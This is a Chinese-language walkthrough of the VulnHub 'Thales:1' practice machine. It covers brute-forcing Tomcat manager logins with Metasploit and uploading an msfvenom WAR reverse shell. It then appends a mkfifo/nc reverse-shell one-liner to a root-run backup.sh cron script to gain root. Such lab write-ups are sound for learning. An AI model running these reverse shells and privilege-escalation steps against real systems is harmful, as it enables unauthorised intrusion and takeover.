vulhub thales:1 靶场

靶机环境下载地址：https://www.vulnhub.com/entry/thales-1,749/

信息收集

对靶机目标进行端口扫描

发现开放了22与8080端口，且8080端口为tomcat代理
使用浏览器进行访问

发现需要进行登录
而且页面好像也没有其他有用的信息
先扫一下后台吧
但是好像依然没有什么有用的信息
（图片走神了~）
于是我只能尝试一下对用户名和密码进行爆破
使用msf


居然成功了

Login Successful: tomcat:role1

漏洞利用

于是反手就去登录
登录进入后

发现这里可以上传文件
这不就是一个可以利用的地方吗
发现需要上传war文件，于是去到https://www.revshells.com/
去生成一个war的反弹shell 的文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.7 LPORT=9001 -f war -o shell.war

这里关于msfvenom就不展开细聊了，有兴趣可以去自行了解或http://t.csdn.cn/0aRRA 去学习
直接上传并在kali进行端口监听

nc -lvvp 9001 

部署成功后，通过网站访问后，成功接收到反弹的shell

进入交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

这个对于提权来说是很重要的一步
进入之后居然是在根目录下，我们先到/home路径下

发现两个文件
第一个notes.txt文件

I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.

说在这个目录下准备了一个backup.sh的文件
再查看另外一个user.txt文件，被拒绝
由于我比较莽，就没有再继续看这个文件，转而就去了/usr/local/bin/backup.sh目录下

查看文件内容，发现这些执行的内容。。。好像不太知道有什么用

提权

但是查看一下权限，root用户权限，我们可以执行和写入
如果通过root用户进行执行，我们再写入反弹shell不就可以提权了
于是先去写入反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.7 1234 >/tmp/f" >> backup.sh
并在kali端进行监听
nc -lvvp 1234

BUT 问题来了，不清楚这个文件是否会自动执行。
通过crontab 查看，thales用户没有计划任务，root用户无权限查看
幸运的是，过了一会，反弹成功

激动的查看，root权限
直接转到root目录下，查看flag

然后查看

crontab -u root -l

确实有计划任务，这次算是一点运气吧
但是-----------------
在去网上查看其他大佬的博客后，虽然没查到是否还有方法能够确定backup.sh文件可以定时执行，但发现了
这个靶场还有另一个flag
就是被我遗忘的/home/thales/目录下的user.txt文件

果然，还是太莽了！
其中若还有遗漏，还望有大佬指点！